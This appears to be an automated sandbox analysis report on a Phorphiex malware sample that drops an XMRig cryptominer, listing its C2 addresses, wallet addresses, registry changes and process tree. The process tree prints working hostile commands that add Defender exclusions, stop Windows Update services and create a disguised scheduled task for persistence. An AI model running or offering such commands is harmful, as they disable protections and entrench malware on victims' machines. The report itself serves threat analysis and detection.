Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2024 05:30
Static task
static1
Behavioral task
behavioral1
Sample
ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe
Resource
win7-20241010-en
General
-
Target
ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe
-
Size
618KB
-
MD5
cd3237b1e648d31b8761196b6c64da8a
-
SHA1
2e677b7cafc3a8ee1696dddf38b176191d256559
-
SHA256
ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7
-
SHA512
d71338a7de6f1859edcbbd9ed0a32430e0561f8ae91883c62e6fbc4bc2d082ebd1d538312ef42543385c514ced0166c552fe211debf783f0deae82530045e4d7
-
SSDEEP
12288:QmKt6DsU6ngc3kY+KC5gzwGKZ4cuQW8XQAL019bqoFARwpVp:QR8Y+sxYWkX019bqgWwpVp
Malware Config
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
-
mutex
mmn7nnm8na
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
phorphiex
http://185.215.113.84
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
sysppvrdnvs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysppvrdnvs.exe -
Phorphiex family
-
Phorphiex payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1937720255.exe family_phorphiex -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
3372814887.exewinupsecvmgr.exedescription pid process target process PID 3336 created 3452 3336 3372814887.exe Explorer.EXE PID 3336 created 3452 3336 3372814887.exe Explorer.EXE PID 2288 created 3452 2288 winupsecvmgr.exe Explorer.EXE PID 2288 created 3452 2288 winupsecvmgr.exe Explorer.EXE PID 2288 created 3452 2288 winupsecvmgr.exe Explorer.EXE -
Processes:
sysppvrdnvs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe -
Xmrig family
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2288-136-0x00007FF72E4E0000-0x00007FF72EA77000-memory.dmp xmrig behavioral2/memory/2556-139-0x00007FF770950000-0x00007FF77113F000-memory.dmp xmrig behavioral2/memory/2556-142-0x00007FF770950000-0x00007FF77113F000-memory.dmp xmrig behavioral2/memory/2556-144-0x00007FF770950000-0x00007FF77113F000-memory.dmp xmrig behavioral2/memory/2556-146-0x00007FF770950000-0x00007FF77113F000-memory.dmp xmrig behavioral2/memory/2556-148-0x00007FF770950000-0x00007FF77113F000-memory.dmp xmrig -
Processes:
powershell.exepowershell.exepowershell.exepid process 3964 powershell.exe 5004 powershell.exe 4288 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
sysppvrdnvs.exe201385805.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation sysppvrdnvs.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 201385805.exe -
Executes dropped EXE 9 IoCs
Processes:
D62C.exe1937720255.exesysppvrdnvs.exe201385805.exe2384329888.exe2209021511.exe3372814887.exe2579512826.exewinupsecvmgr.exepid process 4888 D62C.exe 916 1937720255.exe 1700 sysppvrdnvs.exe 4492 201385805.exe 4948 2384329888.exe 4400 2209021511.exe 3336 3372814887.exe 2372 2579512826.exe 2288 winupsecvmgr.exe -
Processes:
sysppvrdnvs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
1937720255.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" 1937720255.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
winupsecvmgr.exedescription pid process target process PID 2288 set thread context of 2876 2288 winupsecvmgr.exe conhost.exe PID 2288 set thread context of 2556 2288 winupsecvmgr.exe dwm.exe -
Drops file in Windows directory 2 IoCs
Processes:
1937720255.exedescription ioc process File created C:\Windows\sysppvrdnvs.exe 1937720255.exe File opened for modification C:\Windows\sysppvrdnvs.exe 1937720255.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1704 sc.exe 3500 sc.exe 3788 sc.exe 5032 sc.exe 3012 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
sysppvrdnvs.execmd.exesc.exe2384329888.exe2209021511.exe2579512826.exeD62C.exe1937720255.execmd.exesc.exesc.exesc.exepowershell.exesc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2384329888.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2209021511.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2579512826.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language D62C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1937720255.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exe201385805.exe3372814887.exepowershell.exewinupsecvmgr.exepowershell.exepid process 4288 powershell.exe 4288 powershell.exe 4288 powershell.exe 4492 201385805.exe 4492 201385805.exe 3336 3372814887.exe 3336 3372814887.exe 3964 powershell.exe 3964 powershell.exe 3336 3372814887.exe 3336 3372814887.exe 2288 winupsecvmgr.exe 2288 winupsecvmgr.exe 5004 powershell.exe 5004 powershell.exe 2288 winupsecvmgr.exe 2288 winupsecvmgr.exe 2288 winupsecvmgr.exe 2288 winupsecvmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe201385805.exepowershell.exedescription pid process Token: SeDebugPrivilege 4288 powershell.exe Token: SeDebugPrivilege 4492 201385805.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeIncreaseQuotaPrivilege 3964 powershell.exe Token: SeSecurityPrivilege 3964 powershell.exe Token: SeTakeOwnershipPrivilege 3964 powershell.exe Token: SeLoadDriverPrivilege 3964 powershell.exe Token: SeSystemProfilePrivilege 3964 powershell.exe Token: SeSystemtimePrivilege 3964 powershell.exe Token: SeProfSingleProcessPrivilege 3964 powershell.exe Token: SeIncBasePriorityPrivilege 3964 powershell.exe Token: SeCreatePagefilePrivilege 3964 powershell.exe Token: SeBackupPrivilege 3964 powershell.exe Token: SeRestorePrivilege 3964 powershell.exe Token: SeShutdownPrivilege 3964 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeSystemEnvironmentPrivilege 3964 powershell.exe Token: SeRemoteShutdownPrivilege 3964 powershell.exe Token: SeUndockPrivilege 3964 powershell.exe Token: SeManageVolumePrivilege 3964 powershell.exe Token: 33 3964 powershell.exe Token: 34 3964 powershell.exe Token: 35 3964 powershell.exe Token: 36 3964 powershell.exe Token: SeIncreaseQuotaPrivilege 3964 powershell.exe Token: SeSecurityPrivilege 3964 powershell.exe Token: SeTakeOwnershipPrivilege 3964 powershell.exe Token: SeLoadDriverPrivilege 3964 powershell.exe Token: SeSystemProfilePrivilege 3964 powershell.exe Token: SeSystemtimePrivilege 3964 powershell.exe Token: SeProfSingleProcessPrivilege 3964 powershell.exe Token: SeIncBasePriorityPrivilege 3964 powershell.exe Token: SeCreatePagefilePrivilege 3964 powershell.exe Token: SeBackupPrivilege 3964 powershell.exe Token: SeRestorePrivilege 3964 powershell.exe Token: SeShutdownPrivilege 3964 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeSystemEnvironmentPrivilege 3964 powershell.exe Token: SeRemoteShutdownPrivilege 3964 powershell.exe Token: SeUndockPrivilege 3964 powershell.exe Token: SeManageVolumePrivilege 3964 powershell.exe Token: 33 3964 powershell.exe Token: 34 3964 powershell.exe Token: 35 3964 powershell.exe Token: 36 3964 powershell.exe Token: SeIncreaseQuotaPrivilege 3964 powershell.exe Token: SeSecurityPrivilege 3964 powershell.exe Token: SeTakeOwnershipPrivilege 3964 powershell.exe Token: SeLoadDriverPrivilege 3964 powershell.exe Token: SeSystemProfilePrivilege 3964 powershell.exe Token: SeSystemtimePrivilege 3964 powershell.exe Token: SeProfSingleProcessPrivilege 3964 powershell.exe Token: SeIncBasePriorityPrivilege 3964 powershell.exe Token: SeCreatePagefilePrivilege 3964 powershell.exe Token: SeBackupPrivilege 3964 powershell.exe Token: SeRestorePrivilege 3964 powershell.exe Token: SeShutdownPrivilege 3964 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeSystemEnvironmentPrivilege 3964 powershell.exe Token: SeRemoteShutdownPrivilege 3964 powershell.exe Token: SeUndockPrivilege 3964 powershell.exe Token: SeManageVolumePrivilege 3964 powershell.exe Token: 33 3964 powershell.exe Token: 34 3964 powershell.exe -
Suspicious use of WriteProcessMemory 56 IoCs
Processes:
ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exeD62C.exe1937720255.exesysppvrdnvs.execmd.execmd.exe201385805.execmd.execmd.exe2209021511.exewinupsecvmgr.exedescription pid process target process PID 872 wrote to memory of 4888 872 ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe D62C.exe PID 872 wrote to memory of 4888 872 ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe D62C.exe PID 872 wrote to memory of 4888 872 ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe D62C.exe PID 4888 wrote to memory of 916 4888 D62C.exe 1937720255.exe PID 4888 wrote to memory of 916 4888 D62C.exe 1937720255.exe PID 4888 wrote to memory of 916 4888 D62C.exe 1937720255.exe PID 916 wrote to memory of 1700 916 1937720255.exe sysppvrdnvs.exe PID 916 wrote to memory of 1700 916 1937720255.exe sysppvrdnvs.exe PID 916 wrote to memory of 1700 916 1937720255.exe sysppvrdnvs.exe PID 1700 wrote to memory of 3376 1700 sysppvrdnvs.exe cmd.exe PID 1700 wrote to memory of 3376 1700 sysppvrdnvs.exe cmd.exe PID 1700 wrote to memory of 3376 1700 sysppvrdnvs.exe cmd.exe PID 1700 wrote to memory of 720 1700 sysppvrdnvs.exe cmd.exe PID 1700 wrote to memory of 720 1700 sysppvrdnvs.exe cmd.exe PID 1700 wrote to memory of 720 1700 sysppvrdnvs.exe cmd.exe PID 3376 wrote to memory of 4288 3376 cmd.exe powershell.exe PID 3376 wrote to memory of 4288 3376 cmd.exe powershell.exe PID 3376 wrote to memory of 4288 3376 cmd.exe powershell.exe PID 720 wrote to memory of 3788 720 cmd.exe sc.exe PID 720 wrote to memory of 3788 720 cmd.exe sc.exe PID 720 wrote to memory of 3788 720 cmd.exe sc.exe PID 720 wrote to memory of 5032 720 cmd.exe sc.exe PID 720 wrote to memory of 5032 720 cmd.exe sc.exe PID 720 wrote to memory of 5032 720 cmd.exe sc.exe PID 720 wrote to memory of 3012 720 cmd.exe sc.exe PID 720 wrote to memory of 3012 720 cmd.exe sc.exe PID 720 wrote to memory of 3012 720 cmd.exe sc.exe PID 720 wrote to memory of 1704 720 cmd.exe sc.exe PID 720 wrote to memory of 1704 720 cmd.exe sc.exe PID 720 wrote to memory of 1704 720 cmd.exe sc.exe PID 720 wrote to memory of 3500 720 cmd.exe sc.exe PID 720 wrote to memory of 3500 720 cmd.exe sc.exe PID 720 wrote to memory of 3500 720 cmd.exe sc.exe PID 1700 wrote to memory of 4492 1700 sysppvrdnvs.exe 201385805.exe PID 1700 wrote to memory of 4492 1700 sysppvrdnvs.exe 201385805.exe PID 4492 wrote to memory of 4880 4492 201385805.exe cmd.exe PID 4492 wrote to memory of 4880 4492 201385805.exe cmd.exe PID 4492 wrote to memory of 656 4492 201385805.exe cmd.exe PID 4492 wrote to memory of 656 4492 201385805.exe cmd.exe PID 4880 wrote to memory of 1684 4880 cmd.exe reg.exe PID 4880 wrote to memory of 1684 4880 cmd.exe reg.exe PID 656 wrote to memory of 3568 656 cmd.exe schtasks.exe PID 656 wrote to memory of 3568 656 cmd.exe schtasks.exe PID 1700 wrote to memory of 4948 1700 sysppvrdnvs.exe 2384329888.exe PID 1700 wrote to memory of 4948 1700 sysppvrdnvs.exe 2384329888.exe PID 1700 wrote to memory of 4948 1700 sysppvrdnvs.exe 2384329888.exe PID 1700 wrote to memory of 4400 1700 sysppvrdnvs.exe 2209021511.exe PID 1700 wrote to memory of 4400 1700 sysppvrdnvs.exe 2209021511.exe PID 1700 wrote to memory of 4400 1700 sysppvrdnvs.exe 2209021511.exe PID 4400 wrote to memory of 3336 4400 2209021511.exe 3372814887.exe PID 4400 wrote to memory of 3336 4400 2209021511.exe 3372814887.exe PID 1700 wrote to memory of 2372 1700 sysppvrdnvs.exe 2579512826.exe PID 1700 wrote to memory of 2372 1700 sysppvrdnvs.exe 2579512826.exe PID 1700 wrote to memory of 2372 1700 sysppvrdnvs.exe 2579512826.exe PID 2288 wrote to memory of 2876 2288 winupsecvmgr.exe conhost.exe PID 2288 wrote to memory of 2556 2288 winupsecvmgr.exe dwm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe"C:\Users\Admin\AppData\Local\Temp\ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Users\Admin\AppData\Local\Temp\D62C.exe"C:\Users\Admin\AppData\Local\Temp\D62C.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Users\Admin\AppData\Local\Temp\1937720255.exeC:\Users\Admin\AppData\Local\Temp\1937720255.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe5⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3788
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5032
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1704
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3500
-
-
-
C:\Users\Admin\AppData\Local\Temp\201385805.exeC:\Users\Admin\AppData\Local\Temp\201385805.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:1684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:3568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2384329888.exeC:\Users\Admin\AppData\Local\Temp\2384329888.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4948
-
-
C:\Users\Admin\AppData\Local\Temp\2209021511.exeC:\Users\Admin\AppData\Local\Temp\2209021511.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\3372814887.exeC:\Users\Admin\AppData\Local\Temp\3372814887.exe7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3336
-
-
-
C:\Users\Admin\AppData\Local\Temp\2579512826.exeC:\Users\Admin\AppData\Local\Temp\2579512826.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2372
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5004
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2876
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:2556
-
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2288
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5fee026663fcb662152188784794028ee
SHA13c02a26a9cb16648fad85c6477b68ced3cb0cb45
SHA256dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b
SHA5127b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6
-
Filesize
108KB
MD51fcb78fb6cf9720e9d9494c42142d885
SHA1fef9c2e728ab9d56ce9ed28934b3182b6f1d5379
SHA25684652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02
SHA512cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3
-
Filesize
18KB
MD50b233d33975a9d6e4f099d9a15a3c078
SHA1fc4b99e9a618fcbedf77493119859a301d8de238
SHA2561cc29c4e1368c6f16ee5b759b7f2964cf09c1126347719281ec89fc5b80f8985
SHA512f35adad5a1c7e3d9a5c0936a8b6a6c04a893427e7b4f83430bb6b6797cd2c71cc6468c729b3a865315f016872a23cb4bea989eabe2ea34907f777a4daff5cc7a
-
Filesize
1KB
MD5d95b08252ed624f6d91b46523f110f29
SHA117577997bc1fb5d3fbe59be84013165534415dc3
SHA256342ce7c39bf9992d31d4b61ef138b2b084c96c74736ed00bb19aae49be16ca02
SHA5120c4288176d56f4ee6d8f08f568fba07ad859f50a395c39d2afd3baf55d3d29ca065a1ce305d1bd790477c35977c0ffa230543e805622f80a77bcee71b24eb257
-
Filesize
83KB
MD506560b5e92d704395bc6dae58bc7e794
SHA1fbd3e4ae28620197d1f02bfc24adaf4ddacd2372
SHA2569eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d
SHA512b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3
-
Filesize
8KB
MD5cb8420e681f68db1bad5ed24e7b22114
SHA1416fc65d538d3622f5ca71c667a11df88a927c31
SHA2565850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf
-
Filesize
10KB
MD596509ab828867d81c1693b614b22f41d
SHA1c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca
-
Filesize
15KB
MD50c37ee292fec32dba0420e6c94224e28
SHA1012cbdddaddab319a4b3ae2968b42950e929c46b
SHA256981d724feebc36777e99513dc061d1f009e589f965c920797285c46d863060d1
SHA5122b60b571c55d0441ba0cfc695f9db5cd12660ebec7effc7e893c3b7a1c6cb6149df487c31b8d748697e260cbc4af29331592b705ea9638f64a711c7a6164628b
-
Filesize
13KB
MD55a0d146f7a911e98da8cc3c6de8acabf
SHA14ec56b14a08c897a5e9e85f5545b6c976a0be3c1
SHA256bf61e77b7c49ce3346a28d8bc084c210618ea6ec5f3cfa9ae8f4aa4d64e145f1
SHA5126d1526a5f467535d51b7f9b3a7af2d54512526e2523e3048082277b83b6e1a1f0d7e3c617405898f240ae84a16163bc47886d8541a016b31c51dfadf9da713e1
